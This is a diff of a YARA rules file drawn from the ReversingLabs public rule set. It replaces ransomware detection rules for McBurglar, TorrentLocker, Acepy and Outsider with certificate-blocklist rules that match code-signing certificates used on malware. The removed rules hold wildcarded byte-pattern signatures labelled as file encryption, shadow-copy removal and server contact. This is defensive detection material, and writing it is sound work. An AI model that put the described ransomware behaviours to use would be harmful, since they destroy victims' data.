+rule REVERSINGLABS_Cert_Blocklist_071202Dbfda40B629C5E7Acac947C2D3 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects McBurglar ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "11816401-87c3-5aff-b161-da0fa4eb4bca"
-		date = "2021-09-27"
-		modified = "2021-09-27"
+		id = "4206c383-0e6d-5129-8e6a-05bd54c48e65"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.McBurglar.yara#L1-L75"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12424-L12440"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "57fefcdc1528fc1c8da36a431cd09774e33ea08a394ac4f8d19a27504e72676d"
+		logic_hash = "cc51b0ae6a59f68e61ee0b4ff33ea0e1ee9ef04e4c994e1c98da6befab62a5b9"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "McBurglar"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$setup_env = {
-            00 7E ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ??
-            ?? 1B 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 28 ?? ??
-            ?? ?? 00 2A
-        }
-		$encrypt_files_p1 = {
-            00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 73 ?? ?? ?? ?? 0B 07 12 ?? 28 ?? ?? ?? ??
-            7D ?? ?? ?? ?? 00 07 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00
-            00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 2A
-        }
-		$encrypt_files_p2 = {
-            00 28 ?? ?? ?? ?? 0A 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 0B 73 ?? ?? ??
-            ?? 0C 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 00 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 18 6F ?? ?? ?? ?? 00 09 06
-            20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 00 11 ?? 1A 6F ?? ?? ?? ?? 00 07 06 16 06 8E 69 6F ?? ?? ?? ?? 00 07 11 ?? 6F ?? ??
-            ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? ?? ?? ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ??
-            13 ?? 00 2B ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69
-            6F ?? ?? ?? ?? 25 13 ?? 16 FE 02 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13
-            ?? 00 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? DE
-            ?? 00 11 ?? 6F ?? ?? ?? ?? 00 07 6F ?? ?? ?? ?? 00 00 DC 2A
-        }
-		$find_files = {
-            00 00 02 28 ?? ?? ?? ?? 0A 00 06 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 11 ?? 28 ?? ?? ?? ??
-            00 00 09 17 58 0D 09 08 8E 69 32 ?? 02 28 ?? ?? ?? ?? 0B 00 07 13 ?? 16 13 ?? 2B ?? 11
-            ?? 11 ?? 9A 13 ?? 00 11 ?? 28 ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32
-            ?? 00 DE ?? 26 00 00 DE ?? 2A
-        }
-		$generate_salt = {
-            00 1F ?? 8D ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 00 16 0C 2B ?? 00 07 06 6F ?? ?? ?? ?? 00
-            00 08 17 58 0C 08 1F ?? FE 04 0D 09 2D ?? 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 06
-            13 ?? 2B ?? 11 ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $setup_env ) and ( $find_files ) and ( $generate_salt ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Crossfire Industries, LLC" and pe.signatures [ i ] . serial == "07:12:02:db:fd:a4:0b:62:9c:5e:7a:ca:c9:47:c2:d3" and 1658620801 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Torrentlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_98Ab9585C04D7F0E4Cf4De98C14B684D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects TorrentLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "64bdb0db-ea0c-5a0d-9d3e-db1df86c132b"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "445bb30e-e021-5a75-a47e-29fa567acfa5"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.TorrentLocker.yara#L1-L98"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12442-L12460"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f1aa523fa95e142b7e421286d26918e3da4bd3e268fef3f98f00820296291bfc"
+		logic_hash = "ba43dd15b13623bb99d88c93fb9e751deb95a546325a1142d9137b25430d07fd"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "TorrentLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$tlocker_ep = {
-          68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 05 E8 ?? ?? ?? ?? 33 C0 C3
-      }
-		$tlocker_contact_server_1 = {
-          55 8B EC 83 EC ?? 8D 45 ?? 50 8D 4D ?? 51 B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 21 83 7D
-          ?? ?? 8B 45 ?? 75 05 8B 10 89 55 ?? 85 C0 74 0F 50 A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 53 56 57 8D 9B ?? ?? ?? ??
-          8B 4D ?? 8D 55 ?? 52 6A ?? BB ?? ?? ?? ?? 89 4D ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 75 ?? 85 F6 0F 84 2C 01 00 00 8B BE
-          ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 EB 00 00 00 6A ?? 68 ?? ?? ?? ?? 68
-          ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 89 00 00 00 8D 45 ?? 50 8D
-          4D ?? 51 6A ?? 56 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 16 81 4D ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 6A ?? 56 FF
-          15 ?? ?? ?? ?? 8B 45 ?? 57 50 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 38 6A ?? 8D 4D ?? 51 8D 55 ?? 52 68 ?? ?? ?? ??
-          56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 10 81 7D ?? ?? ?? ?? ?? 75 07 C7 45 ?? ?? ?? ??
-          ?? 8B 3D ?? ?? ?? ?? 56 FF D7 EB 06 8B 3D ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? 53 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-          ?? ?? ?? FF 15 ?? ?? ?? ?? 53 8B F0 FF D7 85 F6 74 06 8B 55 ?? 52 FF D7 8B 75 ?? 8B 0D ?? ?? ?? ?? 33 C0 83 7D ?? ?? 56
-          0F 94 C0 6A ?? 51 8B F8 FF 15 ?? ?? ?? ?? 85 FF 75 10 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 9E FE FF FF 5F 5E 5B 8B E5 5D
-          C3
-      }
-		$tlocker_contact_server_2_1 = {
-          55 8B EC 83 EC ?? 8D 45 ?? 50 8D 4D ?? 51 B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 21 83 7D
-          ?? ?? 8B 45 ?? 75 05 8B 10 89 55 ?? 85 C0 74 0F 50 A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 53 56 57 8D 9B ?? ?? ?? ??
-          8B 4D ?? 8D 55 ?? 52 6A ?? BF ?? ?? ?? ?? 89 4D ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 75 ?? 85 F6 0F 84 E5 01 00 00 BF ??
-          ?? ?? ?? 39 3D ?? ?? ?? ?? 74 11 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B
-          9E ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 EB 00 00 00 6A ?? 68 ?? ?? ?? ??
-          68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 89 00 00 00 8D 45 ?? 50
-          8D 4D ?? 51 6A ?? 56 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 16 81 4D ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 6A ?? 56
-          FF 15 ?? ?? ?? ?? 8B 45 ?? 53 50 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 38 6A ?? 8D 4D ?? 51 8D 55 ?? 52 68 ?? ?? ??
-          ?? 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 10 81 7D ?? ?? ?? ?? ?? 75 07 C7 45 ?? ?? ??
-          ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 EB 06 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? 57 C7 45 ?? ?? ?? ?? ?? C7 45 ??
-      }
-		$tlocker_contact_server_2_2 = {
-          ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 57 8B D8 FF D6 85 DB 74 06 8B 55 ?? 52 FF D6 8B 75 ?? 33 C0 83 7D ?? ?? 0F 94 C0 8B F8 85
-          FF 74 18 8B 0D ?? ?? ?? ?? 89 0D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? EB 5E 8B 15 ?? ?? ?? ?? 3B 15 ?? ?? ?? ?? 75
-          34 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B D1 41 89 0D ?? ?? ?? ?? 85 D2 7E 71 8B 0D ?? ?? ?? ?? 3B C1 73 08 8B C8 89 0D
-          ?? ?? ?? ?? 2B C1 3D ?? ?? ?? ?? 72 1C A1 ?? ?? ?? ?? 40 83 F8 ?? 7E 05 A1 ?? ?? ?? ?? 8B C8 A3 ?? ?? ?? ?? E8 ?? ?? ??
-          ?? 81 3D ?? ?? ?? ?? ?? ?? ?? ?? 75 0B 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 56 6A ?? 50 FF 15 ?? ?? ?? ?? 85
-          FF 75 17 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 E5 FD FF FF A3 ?? ?? ?? ?? EB BF 5F 5E 5B 8B E5 5D C3
-      }
-		$tlocker_get_server_data = {
-          55 8B EC 83 EC ?? 56 57 33 FF 57 57 8D 45 ?? 50 53 33 F6 FF 15 ?? ?? ?? ?? 85 C0 74 77 8D 49 ?? 8B 4D ?? 03 CF 85 F6 75
-          73 33 C0 85 C9 74 0F 8B 15 ?? ?? ?? ?? 51 50 52 FF 15 ?? ?? ?? ?? 33 C9 85 C0 0F 95 C1 8B F0 8B C1 85 C0 74 33 8B 55 ??
-          8D 4D ?? 51 52 8D 04 37 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 1C 8B 45 ?? 85 C0 74 ?? 6A ?? 6A ?? 8D 4D ?? 51 53 03 F8 FF 15
-          ?? ?? ?? ?? 85 C0 75 A0 85 F6 74 10 8B 0D ?? ?? ?? ?? 56 6A ?? 51 FF 15 ?? ?? ?? ?? 5F 33 C0 5E 8B E5 5D C3
-      }
-		$tlocker_remove_shadow_copies = {
-          55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? A1 ?? ?? ?? ?? 53 57 6A ?? 33 FF 57 50 FF 15 ?? ?? ?? ?? 8B D8
-          3B DF 0F 84 DC 00 00 00 56 8D B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 0A C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-          68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 5E B8 ?? ?? ?? ?? 8B D3 2B D0 0F B7 08 66 89 0C
-          02 83 C0 ?? 66 3B CF 75 F1 6A ?? 8D 95 ?? ?? ?? ?? 57 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ??
-          51 8D 95 ?? ?? ?? ?? 52 57 68 ?? ?? ?? ?? 57 57 57 53 57 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 0F FF
-          15 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8B F8 83 BD ?? ?? ?? ?? ?? 74 0B 8B B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 53
-          6A ?? 50 FF 15 ?? ?? ?? ?? 5E 8B C7 5F 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 4D ?? 5F 33 CD B8 ?? ?? ?? ?? 5B
-          E8 ?? ?? ?? ?? 8B E5 5D C3
-      }
-		$tlocker_find_files = {
-          55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 0D ?? ?? ?? ?? 8B 45 ?? 53 56 57 68 ?? ?? ?? ?? 33 F6 56 51
-          89 85 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 AD 01 00 00 53 56 56 6A ?? 56 FF 15 ?? ?? ?? ??
-          85 C0 0F 88 89 01 00 00 68 ?? ?? ?? ?? 53 53 FF 15 ?? ?? ?? ?? 8B C3 8D 50 ?? 8D 9B ?? ?? ?? ?? 66 8B 08 83 C0 ?? 66 85
-          C9 75 F5 2B C2 D1 F8 8B F8 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 4D 01 00 00 8D 95 ?? ?? ?? ?? 52 50 FF 15 ?? ??
-          ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 15 01 00 00 F6 85 ?? ?? ?? ?? ?? 0F 84 EC 00 00 00 B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-          66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0
-          83 D8 ?? 85 C0 0F 84 AE 00 00 00 B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66
-          3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 74 74 8D 85 ?? ?? ?? ?? 8D 50 ?? 8B FF
-          66 8B 08 83 C0 ?? 66 85 C9 75 F5 2B C2 D1 F8 03 C7 8D 44 00 ?? 85 C0 74 6C 50 A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ??
-          8B F0 85 F6 74 57 53 8D 4F ?? 51 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 56 56 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ??
-          ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 0A C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 52 FF
-          15 ?? ?? ?? ?? 85 C0 0F 85 EB FE FF FF 8B 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 50 6A ?? 51 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ??
-          ?? 8B 15 ?? ?? ?? ?? 53 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 8B C6 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-      }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $tlocker_ep and $tlocker_get_server_data and $tlocker_remove_shadow_copies and $tlocker_find_files ) and ( $tlocker_contact_server_1 or ( $tlocker_contact_server_2_1 and $tlocker_contact_server_2_2 ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and ( pe.signatures [ i ] . serial == "00:98:ab:95:85:c0:4d:7f:0e:4c:f4:de:98:c1:4b:68:4d" or pe.signatures [ i ] . serial == "98:ab:95:85:c0:4d:7f:0e:4c:f4:de:98:c1:4b:68:4d" ) and 1656547200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Acepy : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4631713E66E91347F0388B98Cf747794 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Acepy ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3ffb45b1-6bde-5bf8-957e-433b9488ba91"
-		date = "2022-08-04"
-		modified = "2022-08-04"
+		id = "6c541522-98ab-5acb-af84-c005c9721e1f"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Acepy.yara#L1-L69"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12462-L12478"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "92c543a0b8c3c884f83647119d32c7b46f5fe839694bb8a8de0146c5c77bc587"
+		logic_hash = "cb517cda67150b7e17ee3bd946903e8e8eca81742a362032249a2f2387e71c50"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Acepy"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ??
-            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? 51 50 E8 ?? ?? ?? ??
-            83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B 08 51 E8 ?? ?? ?? ??
-            83 C4 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            B8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50
-            8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? C9 C3
-        }
-		$encrypt_files = {
-            55 89 E5 81 EC ?? ?? ?? ?? 90 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 8B 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 40 50 B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 8B 45 ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? B8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 4D ?? 39 C8 0F 83 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            8B 45 ?? 89 C1 40 89 45 ?? EB ?? 8B 45 ?? 8B 4D ?? 01 C1 8B 45 ?? 8B 55 ?? 01 C2 8B
-            45 ?? 50 89 4D ?? 89 55 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 8B 4D ?? 31 D2
-            F7 F1 8B 45 ?? 01 D0 8B 4D ?? 0F BE 09 0F BE 10 31 D1 8B 45 ?? 88 08 EB ?? B8 ?? ??
-            ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 B9 ?? ?? ?? ?? 51 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C9 C3
-        }
-		$drop_ransom_note = {
-            55 89 E5 81 EC ?? ?? ?? ?? 90 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 8B 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 50 B8 ?? ?? ?? ?? 50 B8
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ??
-            ?? ?? C9 C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xB9\\xBF\\xE5\\xB7\\x9E\\xE6\\x98\\x8A\\xE5\\x8A\\xA8\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "46:31:71:3e:66:e9:13:47:f0:38:8b:98:cf:74:77:94" and 1488240000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_E963F8983D21B4C1A69C66A9D37498E5 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "4cbc6cc9-1795-5d43-84a1-dd835d7ef349"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12480-L12498"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "b7c715e28f003351d10ba53657e9e667b635a0e4433276d91d26f4482a61191d"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $find_files ) and ( $encrypt_files ) and ( $drop_ransom_note ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Max Steinhard" and ( pe.signatures [ i ] . serial == "00:e9:63:f8:98:3d:21:b4:c1:a6:9c:66:a9:d3:74:98:e5" or pe.signatures [ i ] . serial == "e9:63:f8:98:3d:21:b4:c1:a6:9c:66:a9:d3:74:98:e5" ) and 1656288000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Outsider : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6E44Fcedd49F22F7A28Cecc99104F61A : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Outsider ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "44edccb1-9e2a-5ff9-b4b5-72ceec2f7947"
-		date = "2020-10-23"
-		modified = "2020-10-23"
+		id = "b69a4e06-a732-5462-b2b1-bdde3fd34e31"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Outsider.yara#L1-L88"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12500-L12516"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "80c5a93b5b72b7b66e36f1726486b0c7620588d05bd925510d76f020a40b124c"
